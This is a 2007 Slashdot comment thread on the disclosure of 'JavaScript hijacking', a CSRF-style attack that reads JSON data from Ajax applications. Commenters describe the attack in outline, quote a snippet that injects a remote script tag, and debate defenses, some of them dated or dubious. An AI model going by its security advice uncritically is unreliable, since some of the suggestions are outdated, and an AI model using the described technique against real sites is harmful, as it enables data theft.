Follow Slashdot blog updates by subscribing to our blog RSS feed

 



Forgot your password?
typodupeerror
×
Security The Internet

Web 2.0 Under Siege 170

Robert writes "Security researchers have found what they say is an entirely new kind of web-based attack, and it only targets the Ajax applications so beloved of the 'Web 2.0' movement. Fortify Software, which said it discovered the new class of vulnerability and has named it 'JavaScript hijacking', said that almost all the major Ajax toolkits have been found vulnerable. 'JavaScript Hijacking allows an unauthorized attacker to read sensitive data from a vulnerable application using a technique similar to the one commonly used to create mashups'"
This discussion has been archived. No new comments can be posted.

Web 2.0 Under Siege

Comments Filter:
  • XSS (Score:2, Interesting)

    by Anonymous Coward on Monday April 02, 2007 @11:25AM (#18574321)
    So, how is this different than Javascript injection or Cross-site Scripting?
  • XSRF (Score:2, Interesting)

    by Anonymous Coward on Monday April 02, 2007 @11:30AM (#18574391)
    How is this different than Cross Site Response Forgery?

    http://en.wikipedia.org/wiki/Cross-site_request_fo rgery [wikipedia.org]
  • Re:XSS (Score:1, Interesting)

    by Anonymous Coward on Monday April 02, 2007 @11:36AM (#18574507)
    Regarding regular XSS...

    XSS/JS Injection is more about injecting alien javascript onto site A ...

    OK so far.

    ... to make site A call site B with the info it wants.

    Darn, I thought it was to make site A execute code/retrieve infos from the user's system, not from another site :(

    Would you care to develop a little bit?

  • Where's the problem? (Score:5, Interesting)

    by pimterry ( 970628 ) on Monday April 02, 2007 @11:39AM (#18574557)
    "In an example attack, a victim who has already authenticated themselves to an Ajax application, and has the login cookie in their browser, is persuaded to visit the attacker's web site. This web site contains JavaScript code that makes calls to the Ajax app. Data received from the app is sent to the attacker."

    So essentially it means that the attacker can use the authentication cookie of the user to authenticate them again, and then run javascript with that authentication. But why are AJAX apps storing authentication in cookies? If you need to store authentication (User session id's etc), store them in a variable within the javascript. That'll stay there until a page refresh clears variable status, and how many page refreshes occur with AJAX?

    AJAX apps do not need to (and should not!) store user authentication in cookies. Cookies are useful for keeping a continual session open between pages. AJAX needs no continual session. If they don't use cookies, then other sites cannot use that authentication.

    Where's the problem? (What am i missing?)

    PimTerry
  • Shirky's Law: (Score:5, Interesting)

    by sakusha ( 441986 ) on Monday April 02, 2007 @11:43AM (#18574613)
    "Social Software is stuff that gets spammed."

    The obvious implication of Shirky's Law is that Web 2.0 services are an attractive nuisance and give spammers and other griefers an incentive to game the system. Any new web service has to account for this and build in extremely high levels of security. Obviously nobody is doing this.
  • by slashkitty ( 21637 ) on Monday April 02, 2007 @11:47AM (#18574661) Homepage
    It was reported as a problem with the google address book. These guys just generalized the problem because they saw it in many places.

    It actually could be pretty nasty. I think the only solution is for you to pass authenticated tokens through the url or input parameters (not through cookies).

    It might be a good time to use the firefox NoScript plugin if you're not using it already. Only allow javascript on sites you trust.

  • by unity100 ( 970058 ) on Monday April 02, 2007 @12:44PM (#18575467) Homepage Journal
    If you delegate operations and processes to client side, sooner or later they will be finding more ways to exploit it to an extent that it would be a security risk to offer such client side stuff, making anti-virus, anti-spyware, privacy product manufacturers more agitated about it, and in the end drawing visitors away from your site due to blocks, issues, and fear.
  • by consumer ( 9588 ) on Monday April 02, 2007 @01:03PM (#18575775)
    Checking the referer header is ultimately going to fail because it would mean trusting the client to not lie about the referer. There are some better techniques described in the Wikipedia XSRF entry.
  • Re:sigh (Score:4, Interesting)

    by julesh ( 229690 ) on Monday April 02, 2007 @01:51PM (#18576547)
    This just sounds like a fancy Cross-Site Request Forgery.

    That'll be because it is. It's basically an observation that CSRF on a site which returns data in JSON format allows the attacker to read the content of the result. Well, duh. Of course that happens. It's one of the reasons I've always opposed JSON as a useful format.

    The other reason is equally bad, but only applies to "mash up" type situations: the coder of the client has to trust the server with access to all data in the client. This makes it useless in many situations.

    The best solution would be to scrap the current security system, make subrequest cookies (including XMLHttpRequests) dependent on both the domain the request goes to *and* the domain of the page that caused the request, and allow XMLHttpRequest to access servers other than the page source. This would both fix CSRF and eliminate the need for JSON. What more do you want? :)
  • by julesh ( 229690 ) on Monday April 02, 2007 @02:08PM (#18576797)
    There are several security problems with JSON. First, some web apps parse JSON notation by feeding it into JavaScript's "eval". Now that was dumb.

    You don't say. My first thought on hearing about the entire idea was "why would you want to let a foreign server run its code on your page?"

    The real problem is JavaScript's excessive dynamism. Because you can redefine objects in one script and have that affect another script from a different source, the language is fundamentally vulnerable.

    Err... if I don't let foreign code execute (e.g. by doing 'var e = document.createElement("script"); e.src = "http://www.someotherserver.com/potential-security -risk"; document.body.appendChild (e);', which I've seen many scripts do) how can another site redefine the objects in my script? I think the vulnerability is that most JS programmers are too willing to let other sites execute arbitrary code in their own context, which really ain't good.

    The last attempt to fix this problem involved adding restrictions to XMLHttpRequest, but that only plugged some of the holes.

    The fix seems obvious to me:

    * cookies in subrequests must be tied to the domain of the page that initiated the request as well as the domain the request goes to; this reduces the possibility of CSRF. So if www.a.com has a web page that requests data from www.b.com, it will only send a cookie if www.b.com set one in response to a previous request from www.a.com. This applies to SCRIPT tags, to IFRAME tags, to IMG tags, to LINK tags, etc.

    * XMLHttpRequest must not be tied to the same-domain policy. Attempts to access a different domain should result in a request for confirmation from the user for the first time any particular requester/receiver domain pair is used. This means mashups (and other applications that need cross-domain access) can be written that do not need to use JSON. JSON parsing through script insertion or eval() is insecure, and should be deprecated.

    As a minimum, it's probably desirable to insist in the browser that, on secure pages, all Javascript and data must come from the main page of the domain. No "mashups" with secure pages.

    Scripts, yes. I don't see the need to ensure that data originates in the same domain.

The key elements in human thinking are not numbers but labels of fuzzy sets. -- L. Zadeh

Working...